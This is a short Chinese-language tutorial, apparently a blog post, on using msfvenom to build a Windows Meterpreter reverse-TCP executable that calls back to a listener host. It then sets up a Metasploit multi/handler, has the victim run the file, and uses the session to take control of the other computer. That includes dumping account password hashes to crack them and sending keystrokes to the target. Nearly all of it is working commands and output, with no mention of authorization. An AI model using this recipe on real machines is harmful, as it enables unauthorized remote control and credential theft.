msfvenom的shell在windows中的使用
msfvenom生成shell.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=123.123.123.123 lport=2222 -f exe >/root/shell.exe
輸入命令:
msfconsole
metasploit偵聽
msf > use exploit/multi/handler #加載模塊 msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #設置payload payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 上面的ip #設置kali的ip lhost => 123.123.123.123 msf exploit(multi/handler) > set lport 上面的端口 #設置kali的端口 lport => 2222 msf exploit(multi/handler) > exploit #執行 [*] Started reverse TCP handler on 123.123.123.123:2222
將生成的shell上傳至windows主機中並運行
提示有返回即可控制對方電腦,如同操作linux服務器一樣
kill 后面跟shell端的進程id,如果加-s會結束該會話的進程
ifconfig和ipconfig 看ip
sysinfo 看系統信息
ps 看進程(能看到shell.exe進程)
hashdump 可以dump出賬號口令的hash字段,拿去cmd5解,這里是為空
keyboard_send **** 發送字符串到目標機
參考: